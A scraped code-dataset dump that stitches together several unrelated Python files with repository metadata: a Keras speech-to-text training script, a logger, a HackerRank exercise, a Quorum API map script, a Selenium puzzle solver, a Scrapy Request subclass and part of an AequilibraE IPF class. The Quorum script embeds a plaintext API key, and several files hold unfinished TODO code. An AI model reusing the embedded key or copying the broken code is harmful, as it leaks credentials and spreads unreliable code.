plt.xlabel('Time')
plt.ylabel('Amplitude')
plt.show()
def plot_mfcc_feature(vis_mfcc_feature):
# plot the MFCC feature
fig = plt.figure(figsize=(12,5))
ax = fig.add_subplot(111)
im = ax.imshow(vis_mfcc_feature, cmap=plt.cm.jet, aspect='auto')
plt.title('Normalized MFCC')
plt.ylabel('Time')
plt.xlabel('MFCC Coefficient')
divider = make_axes_locatable(ax)
cax = divider.append_axes("right", size="5%", pad=0.05)
plt.colorbar(im, cax=cax)
ax.set_xticks(np.arange(0, 13, 2), minor=False);
plt.show()
def plot_spectrogram_feature(vis_spectrogram_feature):
# plot the normalized spectrogram
fig = plt.figure(figsize=(12,5))
ax = fig.add_subplot(111)
im = ax.imshow(vis_spectrogram_feature, cmap=plt.cm.jet, aspect='auto')
plt.title('Normalized Spectrogram')
plt.ylabel('Time')
plt.xlabel('Frequency')
divider = make_axes_locatable(ax)
cax = divider.append_axes("right", size="5%", pad=0.05)
plt.colorbar(im, cax=cax)
plt.show()
################################# all codes of data_generator.py ends here ###########################3
# from data_generator import vis_train_features # ## Now codes of data_generator.py are pasted here. So I think that this import is useless
# extract label and audio features for a single training example
vis_text, vis_raw_audio, vis_mfcc_feature, vis_spectrogram_feature, vis_audio_path = vis_train_features()
# allocate 50% of GPU memory (if you like, feel free to change this)
from keras.backend.tensorflow_backend import set_session
from keras.optimizers import RMSprop, SGD
import tensorflow as tf
"""
config = tf.ConfigProto()
config.gpu_options.per_process_gpu_memory_fraction = 0.5
set_session(tf.Session(config=config))
"""
# watch for any changes in the sample_models module, and reload it automatically
#%load_ext autoreload
#%autoreload 2
# import NN architectures for speech recognition
# from sample_models import * # I have pasted code of sample_models in this file. So no need to import this
# import function for training acoustic model
# from train_utils import train_model # I have pasted code of train_utils in this file. So no need to import this
import numpy as np
# from data_generator import AudioGenerator ## Now codes of data_generator.py are pasted here. So I think that this import is useless
from keras import backend as K
from utils import int_sequence_to_text
from IPython.display import Audio
###################### All codes / model defined in sample_models.py start here ################
def simple_rnn_model(input_dim, output_dim=29):
""" Build a recurrent network for speech
"""
# Main acoustic input
input_data = Input(name='the_input', shape=(None, input_dim))
# Add recurrent layer
simp_rnn = GRU(output_dim, return_sequences=True,
implementation=2, name='rnn')(input_data)
# Add softmax activation layer
y_pred = Activation('softmax', name='softmax')(simp_rnn)
# Specify the model
model = Model(inputs=input_data, outputs=y_pred)
model.output_length = lambda x: x
print(model.summary())
return model
def rnn_model(input_dim, units, activation, output_dim=29):
""" Build a recurrent network for speech
"""
# Main acoustic input
input_data = Input(name='the_input', shape=(None, input_dim))
# Add recurrent layer
simp_rnn = LSTM(units, activation=activation,
return_sequences=True, implementation=2, name='rnn')(input_data)
# TODO: Add batch normalization
bn_rnn = BatchNormalization(name='bn_rnn_1d')(simp_rnn)
# TODO: Add a TimeDistributed(Dense(output_dim)) layer
time_dense = TimeDistributed(Dense(output_dim))(bn_rnn)
# Add softmax activation layer
y_pred = Activation('softmax', name='softmax')(time_dense)
# Specify the model
model = Model(inputs=input_data, outputs=y_pred)
model.output_length = lambda x: x
print(model.summary())
return model
def cnn_rnn_model(input_dim, filters, kernel_size, conv_stride,
conv_border_mode, units, output_dim=29):
""" Build a recurrent + convolutional network for speech
"""
# Main acoustic input
input_data = Input(name='the_input', shape=(None, input_dim))
# Add convolutional layer
conv_1d = Conv1D(filters, kernel_size,
strides=conv_stride,
padding=conv_border_mode,
activation='relu',
name='conv1d')(input_data)
# Add batch normalization
bn_cnn = BatchNormalization(name='bn_conv_1d')(conv_1d)
# Add a recurrent layer
simp_rnn = GRU(units, activation='relu',
return_sequences=True, implementation=2, name='rnn')(bn_cnn)
# TODO: Add batch normalization
bn_rnn = BatchNormalization(name='bn_rnn_1d')(simp_rnn)
# TODO: Add a TimeDistributed(Dense(output_dim)) layer
time_dense = TimeDistributed(Dense(output_dim))(bn_rnn)
# Add softmax activation layer
y_pred = Activation('softmax', name='softmax')(time_dense)
# Specify the model
model = Model(inputs=input_data, outputs=y_pred)
model.output_length = lambda x: cnn_output_length(
x, kernel_size, conv_border_mode, conv_stride)
print(model.summary())
return model
def cnn_output_length(input_length, filter_size, border_mode, stride,
dilation=1):
""" Compute the length of the output sequence after 1D convolution along
time. Note that this function is in line with the function used in
Convolution1D class from Keras.
Params:
input_length (int): Length of the input sequence.
filter_size (int): Width of the convolution kernel.
border_mode (str): Only support `same` or `valid`.
stride (int): Stride size used in 1D convolution.
dilation (int)
"""
if input_length is None:
return None
assert border_mode in {'same', 'valid'}
dilated_filter_size = filter_size + (filter_size - 1) * (dilation - 1)
if border_mode == 'same':
output_length = input_length
elif border_mode == 'valid':
output_length = input_length - dilated_filter_size + 1
return (output_length + stride - 1) // stride
def deep_rnn_model(input_dim, units, recur_layers, output_dim=29):
""" Build a deep recurrent network for speech
"""
# Main acoustic input
input_data = Input(name='the_input', shape=(None, input_dim))
# TODO: Add recurrent layers, each with batch normalization
if recur_layers == 1:
layer = LSTM(units, return_sequences=True, activation='relu')(input_data)
layer = BatchNormalization(name='bt_rnn_1')(layer)
else:
layer = LSTM(units, return_sequences=True, activation='relu')(input_data)
layer = BatchNormalization(name='bt_rnn_1')(layer)
for i in range(recur_layers - 2):
layer = LSTM(units, return_sequences=True, activation='relu')(layer)
layer = BatchNormalization(name='bt_rnn_{}'.format(2+i))(layer)
layer = LSTM(units, return_sequences=True, activation='relu')(layer)
layer = BatchNormalization(name='bt_rnn_last_rnn')(layer)
# TODO: Add a TimeDistributed(Dense(output_dim)) layer
time_dense = TimeDistributed(Dense(output_dim))(layer)
# Add softmax activation layer
y_pred = Activation('softmax', name='softmax')(time_dense)
# Specify the model
model = Model(inputs=input_data, outputs=y_pred)
model.output_length = lambda x: x
print(model.summary())
return model
def bidirectional_rnn_model(input_dim, units, output_dim=29):
""" Build a bidirectional recurrent network for speech
"""
# Main acoustic input
input_data = Input(name='the_input', shape=(None, input_dim))
# TODO: Add bidirectional recurrent layer
bidir_rnn = Bidirectional(LSTM(units, return_sequences=True, activation='relu'), merge_mode='concat')(input_data)
# TODO: Add a TimeDistributed(Dense(output_dim)) layer
time_dense = TimeDistributed(Dense(output_dim))(bidir_rnn)
# Add softmax activation layer
y_pred = Activation('softmax', name='softmax')(time_dense)
# Specify the model
model = Model(inputs=input_data, outputs=y_pred)
model.output_length = lambda x: x
print(model.summary())
return model
def final_model(input_dim, filters, kernel_size, conv_stride,
conv_border_mode, units, output_dim=29, dropout_rate=0.5, number_of_layers=2,
cell=GRU, activation='tanh'):
""" Build a deep network for speech
"""
# Main acoustic input
input_data = Input(name='the_input', shape=(None, input_dim))
# TODO: Specify the layers in your network
conv_1d = Conv1D(filters, kernel_size,
strides=conv_stride,
padding=conv_border_mode,
activation='relu',
name='layer_1_conv',
dilation_rate=1)(input_data)
conv_bn = BatchNormalization(name='conv_batch_norm')(conv_1d)
if number_of_layers == 1:
layer = cell(units, activation=activation,
return_sequences=True, implementation=2, name='rnn_1', dropout=dropout_rate)(conv_bn)
layer = BatchNormalization(name='bt_rnn_1')(layer)
else:
layer = cell(units, activation=activation,
return_sequences=True, implementation=2, name='rnn_1', dropout=dropout_rate)(conv_bn)
layer = BatchNormalization(name='bt_rnn_1')(layer)
for i in range(number_of_layers - 2):
layer = cell(units, activation=activation,
return_sequences=True, implementation=2, name='rnn_{}'.format(i+2), dropout=dropout_rate)(layer)
layer = BatchNormalization(name='bt_rnn_{}'.format(i+2))(layer)
layer = cell(units, activation=activation,
return_sequences=True, implementation=2, name='final_layer_of_rnn')(layer)
layer = BatchNormalization(name='bt_rnn_final')(layer)
time_dense = TimeDistributed(Dense(output_dim))(layer)
# TODO: Add softmax activation layer
y_pred = Activation('softmax', name='softmax')(time_dense)
# Specify the model
model = Model(inputs=input_data, outputs=y_pred)
# TODO: Specify model.output_length
model.output_length = lambda x: cnn_output_length(
x, kernel_size, conv_border_mode, conv_stride)
print(model.summary())
return model
##################################### code / model defined in sample_models.py ends here ##############################
########################## all codes of train_utils.py starts here #########################
def ctc_lambda_func(args):
y_pred, labels, input_length, label_length = args
#print("y_pred.shape = " + str(y_pred.shape))
#print("labels.shape = " + str(labels.shape))
#print("input_length.shape = " + str(input_length.shape))
#print("label_length.shape = " + str(label_length.shape))
return K.ctc_batch_cost(labels, y_pred, input_length, label_length) # input_length= seq length of each item in y_pred
# label_length is the seq length of each item in labels
def add_ctc_loss(input_to_softmax):
the_labels = Input(name='the_labels', shape=(None,), dtype='float32')
input_lengths = Input(name='input_length', shape=(1,), dtype='int64')
label_lengths = Input(name='label_length', shape=(1,), dtype='int64')
output_lengths = Lambda(input_to_softmax.output_length)(input_lengths)
# output_length = BatchNormalization()(input_lengths)
# CTC loss is implemented in a lambda layer
loss_out = Lambda(ctc_lambda_func, output_shape=(1,), name='ctc')(
[input_to_softmax.output, the_labels, output_lengths, label_lengths])
model = Model(
inputs=[input_to_softmax.input, the_labels, input_lengths, label_lengths],
outputs=loss_out)
return model
def train_model(input_to_softmax,
pickle_path,
save_model_path,
train_json='train_corpus.json',
valid_json='valid_corpus.json',
minibatch_size=20,
spectrogram=True,
mfcc_dim=13,
optimizer=SGD(lr=0.02, decay=1e-6, momentum=0.9, nesterov=True, clipnorm=5),
epochs=20,
verbose=1,
sort_by_duration=False,
max_duration=10.0):
# create a class instance for obtaining batches of data
audio_gen = AudioGenerator(minibatch_size=minibatch_size,
spectrogram=spectrogram, mfcc_dim=mfcc_dim, max_duration=max_duration,
sort_by_duration=sort_by_duration)
# add the training data to the generator
audio_gen.load_train_data(train_json)
audio_gen.load_validation_data(valid_json)
# calculate steps_per_epoch
num_train_examples=len(audio_gen.train_audio_paths)
steps_per_epoch = num_train_examples//minibatch_size
# calculate validation_steps
num_valid_samples = len(audio_gen.valid_audio_paths)
validation_steps = num_valid_samples//minibatch_size
# add CTC loss to the NN specified in input_to_softmax
model = add_ctc_loss(input_to_softmax)
# CTC loss is implemented elsewhere, so use a dummy lambda function for the loss
model.compile(loss={'ctc': lambda y_true, y_pred: y_pred}, optimizer=optimizer)
# make results/ directory, if necessary
if not os.path.exists('results'):
os.makedirs('results')
# add checkpointer
checkpointer = ModelCheckpoint(filepath='results/'+save_model_path, verbose=0)
# train the model
hist = model.fit_generator(generator=audio_gen.next_train(), steps_per_epoch=steps_per_epoch,
epochs=epochs, validation_data=audio_gen.next_valid(), validation_steps=validation_steps,
callbacks=[checkpointer], verbose=verbose)
# save model loss
with open('results/'+pickle_path, 'wb') as f:
pickle.dump(hist.history, f)
################################ all codes of train_utils.py ends here #######################################
"""
model_0 = simple_rnn_model(input_dim=13) # change to 13 if you would like to use MFCC features
"""
"""
train_model(input_to_softmax=model_0,
pickle_path='model_0.pickle',
save_model_path='model_0.h5',
spectrogram=False) # change to False if you would like to use MFCC features
"""
model_end = final_model(input_dim=13,
filters=200,
kernel_size=11,
conv_stride=2,
conv_border_mode='valid',
units=200,
activation='relu',
cell=GRU,
dropout_rate=1,
number_of_layers=2)
train_model(input_to_softmax=model_end,
pickle_path='model_end.pickle',
save_model_path='model_end.h5',
epochs=5,
spectrogram=False)
"""
model_4 = bidirectional_rnn_model(input_dim=13, # change to 13 if you would like to use MFCC features
units=200)
train_model(input_to_softmax=model_4,
pickle_path='model_4.pickle',
save_model_path='model_4.h5',
epochs=5,
optimizer=SGD(lr=0.02, decay=1e-6, momentum=0.9, nesterov=True, clipnorm=2),
spectrogram=False) # change to False if you would like to use MFCC features
"""
def get_predictions(index, partition, input_to_softmax, model_path):
""" Print a model's decoded predictions
Params:
index (int): The example you would like to visualize
partition (str): One of 'train' or 'validation'
input_to_softmax (Model): The acoustic model
model_path (str): Path to saved acoustic model's weights
"""
# load the train and test data
data_gen = AudioGenerator(spectrogram=False)
data_gen.load_train_data()
data_gen.load_validation_data()
# obtain the true transcription and the audio features
if partition == 'validation':
transcr = data_gen.valid_texts[index]
audio_path = data_gen.valid_audio_paths[index]
data_point = data_gen.normalize(data_gen.featurize(audio_path))
elif partition == 'train':
transcr = data_gen.train_texts[index]
audio_path = data_gen.train_audio_paths[index]
data_point = data_gen.normalize(data_gen.featurize(audio_path))
else:
raise Exception('Invalid partition! Must be "train" or "validation"')
# obtain and decode the acoustic model's predictions
input_to_softmax.load_weights(model_path)
prediction = input_to_softmax.predict(np.expand_dims(data_point, axis=0))
print("prediction.shape: " + str(prediction.shape))
output_length = [input_to_softmax.output_length(data_point.shape[0])]
pred_ints = (K.eval(K.ctc_decode(
prediction, output_length)[0][0])+1).flatten().tolist()
print("pred_ints: " + str(pred_ints))
print("len(pred_ints): " + str(len(pred_ints)))
# play the audio file, and display the true and predicted transcriptions
print('-'*80)
Audio(audio_path)
print('True transcription:\n' + '\n' + transcr)
print('-'*80)
print('Predicted transcription:\n' + '\n' + ''.join(int_sequence_to_text(pred_ints)))
print('-'*80)
"""
get_predictions(index=2,
partition='validation',
input_to_softmax=model_end,
model_path='results/model_end.h5')
"""
"""
get_predictions(index=1,
partition='validation',
input_to_softmax=model_0,
model_path='results/model_0.h5')
"""
|
MdAbuNafeeIbnaZahid/English-Speech-to-Text-Using-Keras
|
speech-recognition-neural-network/train.py
|
train.py
|
py
| 31,706 |
python
|
en
|
code
| 6 |
github-code
|
6
|
28892210067
|
import os
import time
def log(filename, text):
"""
Writes text to file in logs/mainnet/filename and adds a timestamp
:param filename: filename
:param text: text
:return: None
"""
path = "logs/mainnet/"
if not os.path.isdir("logs/"):
os.makedirs("logs/")
if not os.path.isdir("logs/mainnet/"):
os.makedirs("logs/mainnet/")
f = open(path+filename, "a")
f.write(time.strftime('[%Y-%m-%d %H:%M:%S]:', time.localtime(time.time()))+str(text)+"\n")
f.flush()
f.close()
def log_and_print(filename, text):
"""
Writes text to file in logs/mainnet/filename, adds a timestamp and prints the same to the console
:param filename: filename
:param text: text
:return: None
"""
log(filename, text)
print(time.strftime('[%Y-%m-%d %H:%M:%S]:', time.localtime(time.time()))+str(text))
|
Devel484/Equalizer
|
API/log.py
|
log.py
|
py
| 871 |
python
|
en
|
code
| 4 |
github-code
|
6
|
32028505345
|
#x = int(input())
#y = int(input())
#z = int(input())
#n = int(input())
#
#array = []
#for valuex in range(0,x+1):
# for valuey in range (0,y+1):
# for valuez in range (0,z+1):
# if (valuex + valuey + valuez ==n):
# continue
# else:
# array.append([valuex,valuey,valuez])
# #print(f"[{valuex},{valuey},{valuez}]")
#
#
#print(array)
"""Version IA"""
x = int(input())
y = int(input())
z = int(input())
n = int(input())
# Genera todas las combinaciones posibles de x, y y z -- Igual al tripe for anidado
combinations = [(valuex, valuey, valuez) for valuex in range(0, x+1) for valuey in range(0, y+1) for valuez in range(0, z+1)]
print(valuex)
#Filtra la lista para incluir solo las combinaciones que cumplen la condición
array = [combination for combination in combinations if sum(combination) != n]
print(array)
|
Andreius-14/Notas_Mini
|
3.Python/Hackerrank/array.py
|
array.py
|
py
| 899 |
python
|
en
|
code
| 0 |
github-code
|
6
|
6309221669
|
# this sets your path correctly so the imports work
import sys
import os
sys.path.insert(1, os.path.dirname(os.getcwd()))
from api import QuorumAPI
import json
# this library will let us turn dictionaries into csv files
import csv
STATES = {
'AK': 'Alaska',
'AL': 'Alabama',
'AR': 'Arkansas',
'AS': 'American Samoa',
'AZ': 'Arizona',
'CA': 'California',
'CO': 'Colorado',
'CT': 'Connecticut',
'DC': 'District of Columbia',
'DE': 'Delaware',
'FL': 'Florida',
'GA': 'Georgia',
'GU': 'Guam',
'HI': 'Hawaii',
'IA': 'Iowa',
'ID': 'Idaho',
'IL': 'Illinois',
'IN': 'Indiana',
'KS': 'Kansas',
'KY': 'Kentucky',
'LA': 'Louisiana',
'MA': 'Massachusetts',
'MD': 'Maryland',
'ME': 'Maine',
'MI': 'Michigan',
'MN': 'Minnesota',
'MO': 'Missouri',
'MP': 'Northern Mariana Islands',
'MS': 'Mississippi',
'MT': 'Montana',
'NA': 'National',
'NC': 'North Carolina',
'ND': 'North Dakota',
'NE': 'Nebraska',
'NH': 'New Hampshire',
'NJ': 'New Jersey',
'NM': 'New Mexico',
'NV': 'Nevada',
'NY': 'New York',
'OH': 'Ohio',
'OK': 'Oklahoma',
'OR': 'Oregon',
'PA': 'Pennsylvania',
'PR': 'Puerto Rico',
'RI': 'Rhode Island',
'SC': 'South Carolina',
'SD': 'South Dakota',
'TN': 'Tennessee',
'TX': 'Texas',
'UT': 'Utah',
'VA': 'Virginia',
'VI': 'Virgin Islands',
'VT': 'Vermont',
'WA': 'Washington',
'WI': 'Wisconsin',
'WV': 'West Virginia',
'WY': 'Wyoming'
}
class MapAPI(QuorumAPI):
def map(self, return_map=False):
if return_map in [True, False]:
self.filters["map"] = return_map
else:
raise Exception("Must be a Boolean value!")
return self
class MapVisualizer(object):
# Since both the api_key and username stay the same so initialize API object once
quorum_api = MapAPI(username="gwc", api_key="691e43c415d88cd16286edb1f78abb2e348688da")
# Let's write a helper function that takes in a dictionary of (state, number)
# key-value pairs and produces a csv file of the following format:
# state,num
# Alabama,9
# Alaska, 5
# ...etc.
# We can use the csv class that we imported above.
def save_state_csv(self, item_list, file_name):
# we want to use python's 'with...as' syntax because
# it is a safe way to open and write files.
with open(file_name, 'w') as f: # w instead of wb in python 3
w = csv.writer(f, delimiter=',')
w.writerow(('state', 'num'))
for i in item_list:
w.writerow((STATES[i['state'].upper()], i['value']))
def get_female_legislators_per_state(self, search_term):
"""
get the number of female legislators per state.
Write this to the data.csv file that will then be used
"""
# An enum is a data type consisting of a set of named values called elements or numbers. A color enum may include
# blue, green, and red.
# class Gender(PublicEnum):
# male = enum.Item(
# 1,
# 'Male',
# slug="male",
# pronoun="he",
# pronoun_object="him",
# pronoun_possessive="his",
# honorific="Mr."
# )
# female = enum.Item(
# 2,
# 'Female',
# slug="female",
# pronoun="she",
# pronoun_object="her",
# pronoun_possessive="her",
# honorific="Ms."
# How can we get the number of female legislators per state?
quorum_api_females = self.quorum_api.set_endpoint("TODO") \
.map(True) \
.count(True) \
.filter(
# TODO
most_recent_person_type=1 # legislators
)
# retrives the total females and assigns to dictionary
total_females = quorum_api_females.GET()
# Clears the API results before the next API call
quorum_api_females.clear()
# How can we get the total number of legislators per state?
# TODO
# Retrive the total number of legislators per state and assign to dictionary
# Clear the API results before next API call
# Now let's find the proportion of women over total legislators per state!
self.save_state_csv(TODO, 'data.csv')
# After you are done with implementing the code, initialize a map!
cv = MapVisualizer()
# And enter the search term that you are interested in, and go back to localhost:8000,
# is the map what you expected it to be?
cv.get_female_legislators_per_state()
|
wynonna/from_GWC_laptop
|
quorum-gwc-master/project_2/main.py
|
main.py
|
py
| 5,060 |
python
|
en
|
code
| 0 |
github-code
|
6
|
37559653754
|
from selenium import webdriver
import time
# Have to change the path according to where your chromedriver locate
PATH = "C:\Program Files (x86)\chromedriver.exe"
driver = webdriver.Chrome(PATH)
driver.get("http://ec2-54-208-152-154.compute-1.amazonaws.com/")
arrayOfBar = []
arrayLeftBowl = []
arrayRightBowl = []
n = 9;
for i in range(n):
arrayLeftBowl.append(driver.find_element_by_id("left_" + str(i)))
arrayRightBowl.append(driver.find_element_by_id("right_" + str(i)))
arrayOfBar.append(driver.find_element_by_id("coin_" + str(i)))
"""
This problem is best to divide and conquer. It is suited for Binary Search Algorithm.
We can divide the array of gold bar into three locations. Left table, mid, and the right table.
If the left table and right table are equal weight then it mean the mid is FAKE GOLD.
But if the left table is less than the right table. Then we would toss everthing from mid + 1
to n (size of array). Or if the left table is greater than the right table, then we would toss everything from 0 to mid - 1.
Doing this we are dividing the search item by half of the size of the array and conquer it by picking the table that is less than.
This would give us time complexity of O(logn) time.
"""
low = 0
high = len(arrayOfBar) - 1
while(low < high):
mid = int(low + ((high - low) / 2))
# reset the table
driver.find_element_by_xpath("/html/body/div/div/div[1]/div[4]/button[1]").click()
j = 0
for i in range (low, mid):
# setting the left table
arrayLeftBowl[j].send_keys(i)
j += 1
j = 0
for i in range (mid + 1, high + 1):
# setting the right table
arrayRightBowl[j].send_keys(i)
j += 1
# Weight the item
driver.find_element_by_xpath("/html/body/div/div/div[1]/div[4]/button[2]").click()
time.sleep(5)
# getting the result after weight
result = driver.find_element_by_xpath("/html/body/div/div/div[1]/div[2]/button").text
if(j == 1):
if(result == "<"):
print("Fake gold is " + str(low))
arrayOfBar[low].click()
break
elif(result == ">"):
print("Fake gold is " + str(high))
arrayOfBar[high].click()
break
if(result == "="):
print("Fake gold is " + str(mid))
arrayOfBar[mid].click()
break
elif( result == ">"):
low = mid;
else:
high = mid;
time.sleep(3)
driver.quit()
|
LiyaNorng/Fetch-Rewards-Coding-Exercise
|
FakeGold.py
|
FakeGold.py
|
py
| 2,344 |
python
|
en
|
code
| 1 |
github-code
|
6
|
60822349
|
"""
scrapy1.5限制request.callback and request.errback不能为非None以外的任何非可调用对象,导致一些功能无法实现。这里解除该限制
"""
from scrapy import Request as _Request
from scrapy.http.headers import Headers
class Request(_Request):
def __init__(self, url, callback=None, method='GET', headers=None, body=None,
cookies=None, meta=None, encoding='utf-8', priority=0,
dont_filter=False, errback=None, flags=None, cb_kwargs=None):
self._encoding = encoding # this one has to be set first
self.method = str(method).upper()
self._set_url(url)
self._set_body(body)
assert isinstance(priority, int), "Request priority not an integer: %r" % priority
self.priority = priority
assert callback or not errback, "Cannot use errback without a callback"
self.callback = callback
self.errback = errback
self.cookies = cookies or {}
self.headers = Headers(headers or {}, encoding=encoding)
self.dont_filter = dont_filter
self._meta = dict(meta) if meta else None
self._cb_kwargs = dict(cb_kwargs) if cb_kwargs else None
self.flags = [] if flags is None else list(flags)
|
ShichaoMa/structure_spider
|
structor/custom_request.py
|
custom_request.py
|
py
| 1,255 |
python
|
en
|
code
| 29 |
github-code
|
6
|
24452709455
|
import json
import os
import random
from nonebot import on_keyword, logger
from nonebot.adapters.mirai2 import MessageSegment, Bot, Event
tarot = on_keyword({"塔罗牌"}, priority=5)
@tarot.handle()
async def send_tarot(bot: Bot, event: Event):
"""塔罗牌"""
card, filename = await get_random_tarot()
image_dir = random.choice(['normal', 'reverse'])
card_type = '正位' if image_dir == 'normal' else '逆位'
content = f"{card['name']} ({card['name-en']}) {card_type}\n牌意:{card['meaning'][image_dir]}"
elements = []
img_path = os.path.join(f"{os.getcwd()}", "warfarin", "plugins", "Tarot", "resource", f"{image_dir}",
f"{filename}.jpg")
logger.debug(f"塔罗牌图片:{img_path}")
if filename and os.path.exists(img_path):
elements.append(MessageSegment.image(path=img_path))
elements.append(MessageSegment.plain(content))
await tarot.finish(elements)
async def get_random_tarot():
# path = f"{os.getcwd()}/warfarin/plugins/Tarot/resource/tarot.json"
path = os.path.join(f"{os.getcwd()}", "warfarin", "plugins", "Tarot", "resource", "tarot.json")
with open(path, 'r', encoding='utf-8') as json_file:
data = json.load(json_file)
kinds = ['major', 'pentacles', 'wands', 'cups', 'swords']
cards = []
for kind in kinds:
cards.extend(data[kind])
card = random.choice(cards)
filename = ''
for kind in kinds:
if card in data[kind]:
filename = '{}{:02d}'.format(kind, card['num'])
break
return card, filename
|
mzttsaintly/Warfarin-bot
|
warfarin/plugins/Tarot/__init__.py
|
__init__.py
|
py
| 1,590 |
python
|
en
|
code
| 1 |
github-code
|
6
|
32509281023
|
import torch
import torch.nn as nn # nn.linear 라이브러리를 사용하기 위해 import
# F.mse(mean squared error) <- linear regression, LOSS Function 존재
# Classification problem에서 사용하는 loss function : Cross-Entropy
import torch.nn.functional as F
import torch.optim as optim # SGD, Adam, etc.최적화 라이브러리
# 임의 데이터 생성
# 입력이 1, 출력이 1
# Multi-variable linear regression (입력 3, 출력 1)
# input(x_train) 4x3 2D Tensor 생성
x_train = torch.FloatTensor([[90, 73, 89],
[66, 92, 83],
[86, 87, 78],
[85, 96, 75]])
# y_train (GT)
y_train = torch.FloatTensor([[152],
[185],
[100],
[193]])
# 모델 선언 및 초기화
# y = WX (w1*x1 + w2*x2...wn*xn + b)
# nn.Linear(input_dim, output_dim)
# 초기화
# w = randn(1)
# model.paramters (weight: 3, bias: 1)
# weight, bias : 랜덤한 값으로 자동 셋팅
model = nn.Linear(3, 1) # get_weights()함수 참고..
# model.parameters() 최적화, w,b로 미분을 해야하므로 (requires_grad=True) 셋팅된 것을 확인할 수 있음.
print(list(model.parameters()))
optimizer = optim.SGD(model.parameters(), lr=0.01) # learning_rate 설정: 노가다하면서.. 구하세요.
# iteration 횟수 지정 (epoch 횟수 지정)
# epoch : 전체 훈련 데이터에 대해 경사 하강법을 적용하는 횟수 (2000번을 돌면서 w, b 값을 update)
nb_epochs = 2000
for epoch in range(nb_epochs+1):
# H(x) 계산 wx+b를 한번 계산한 결과값을 pred 변수에 assign
# x_train = 입력 데이터 (1, 2, 3), w (0.6242), b (-0.1192)
# 추정값 = w*x_train+b
pred = model(x_train)
# cost 계산 (loss function : Mean Square Error)
# Cost fuction, loss Function --> Cost, Loss, Error
# mse = mean(sum(pow(y, y^))))
cost = F.mse_loss(pred, y_train) # y_train (GT, 결과, 2, 4, 6)
# SGD를 이용해서 최적값 도출하는 부분 (w,b 값을 조정)
optimizer.zero_grad() # gradient 계산 시 zero 초기화가 들어가 있지 않으면 누적된 값으로 적용
cost.backward() # 실제 기울기 값 계산하는 부분
optimizer.step() # w, b 값을 update 하는 부분
# 100번 마다 로그 출력
if epoch % 100 == 0:
tmp = list(model.parameters())
print(f'Epoch: {epoch:4d} Cost : {cost.item(): .6f}')
print(f'w, b: {tmp[0]}, {tmp[1]}')
new_var = torch.FloatTensor([[73, 80, 75]])
# 152에 근접한 값이 출력이 되면 학습이 잘 된 것으로 판단.
pred_y = model(new_var) # model.forward(new_var)
|
JEONJinah/Shin
|
multi_varialbe_LR.py
|
multi_varialbe_LR.py
|
py
| 2,761 |
python
|
ko
|
code
| 0 |
github-code
|
6
|
38958650130
|
import os
if not os.path.exists('./checkpoints'):
os.makedirs('./checkpoints')
if not os.path.exists('./model'):
os.makedirs('./model')
#Simulation configuration
MAX_EPISODE = 500
TS = 1e-3
CLR_DECAY = 0
ALR_DECAY = 0
# Hyper-parameters
WARMUP = False
EPS_WARM = 5
#Learning strategies
PANDA = True
TRAIN = False
|
giuliomattera/Cartpole-RL-agents-control-ros-bridge-for-simulink
|
rl_connection/src/config.py
|
config.py
|
py
| 328 |
python
|
en
|
code
| 6 |
github-code
|
6
|
18307407152
|
import importlib.util as iutil
import os
from datetime import datetime
from time import perf_counter
from uuid import uuid4
import numpy as np
import yaml
from aequilibrae.distribution.ipf_core import ipf_core
from aequilibrae.context import get_active_project
from aequilibrae.matrix import AequilibraeMatrix, AequilibraeData
from aequilibrae.project.data.matrix_record import MatrixRecord
spec = iutil.find_spec("openmatrix")
has_omx = spec is not None
class Ipf:
"""Iterative proportional fitting procedure
.. code-block:: python
>>> from aequilibrae import Project
>>> from aequilibrae.distribution import Ipf
>>> from aequilibrae.matrix import AequilibraeMatrix, AequilibraeData
>>> project = Project.from_path("/tmp/test_project_ipf")
>>> matrix = AequilibraeMatrix()
# Here we can create from OMX or load from an AequilibraE matrix.
>>> matrix.load('/tmp/test_project/matrices/demand.omx')
>>> matrix.computational_view()
>>> args = {"entries": matrix.zones, "field_names": ["productions", "attractions"],
... "data_types": [np.float64, np.float64], "memory_mode": True}
>>> vectors = AequilibraeData()
>>> vectors.create_empty(**args)
>>> vectors.productions[:] = matrix.rows()[:]
>>> vectors.attractions[:] = matrix.columns()[:]
# We assume that the indices would be sorted and that they would match the matrix indices
>>> vectors.index[:] = matrix.index[:]
>>> args = {
... "matrix": matrix, "rows": vectors, "row_field": "productions", "columns": vectors,
... "column_field": "attractions", "nan_as_zero": False}
>>> fratar = Ipf(**args)
>>> fratar.fit()
# We can get back to our OMX matrix in the end
>>> fratar.output.export("/tmp/to_omx_output.omx")
>>> fratar.output.export("/tmp/to_aem_output.aem")
"""
def __init__(self, project=None, **kwargs):
"""
Instantiates the Ipf problem
:Arguments:
**matrix** (:obj:`AequilibraeMatrix`): Seed Matrix
**rows** (:obj:`AequilibraeData`): Vector object with data for row totals
**row_field** (:obj:`str`): Field name that contains the data for the row totals
**columns** (:obj:`AequilibraeData`): Vector object with data for column totals
**column_field** (:obj:`str`): Field name that contains the data for the column totals
**parameters** (:obj:`str`, optional): Convergence parameters. Defaults to those in the parameter file
**nan_as_zero** (:obj:`bool`, optional): If Nan values should be treated as zero. Defaults to True
:Results:
**output** (:obj:`AequilibraeMatrix`): Result Matrix
**report** (:obj:`list`): Iteration and convergence report
**error** (:obj:`str`): Error description
"""
self.cpus = 0
self.parameters = kwargs.get("parameters", self.__get_parameters("ipf"))
# Seed matrix
self.matrix = kwargs.get("matrix", None) # type: AequilibraeMatrix
# NaN as zero
self.nan_as_zero = kwargs.get("nan_as_zero", True)
# row vector
self.rows = kwargs.get("rows", None)
self.row_field = kwargs.get("row_field", None)
self.output_name = kwargs.get("output", AequilibraeMatrix().random_name())
# Column vector
self.columns = kwargs.get("columns", None)
self.column_field = kwargs.get("column_field", None)
self.output = AequilibraeMatrix()
self.error = None
self.__required_parameters = ["convergence level", "max iterations", "balancing tolerance"]
self.error_free = True
self.report = [" ##### IPF computation ##### ", ""]
self.gap = None
self.procedure_date = ""
self.procedure_id = ""
def __check_data(self):
self.error = None
self.__check_parameters()
# check data types
if not isinstance(self.rows, AequilibraeData):
raise TypeError("Row vector needs to be an instance of AequilibraeData")
if not isinstance(self.columns, AequilibraeData):
raise TypeError("Column vector needs to be an instance of AequilibraeData")
if not isinstance(self.matrix, AequilibraeMatrix):
raise TypeError("Seed matrix needs to be an instance of AequilibraeMatrix")
# Check data type
if not np.issubdtype(self.matrix.dtype, np.floating):
raise ValueError("Seed matrix need to be a float type")
row_data = self.rows.data
col_data = self.columns.data
if not np.issubdtype(row_data[self.row_field].dtype, np.floating):
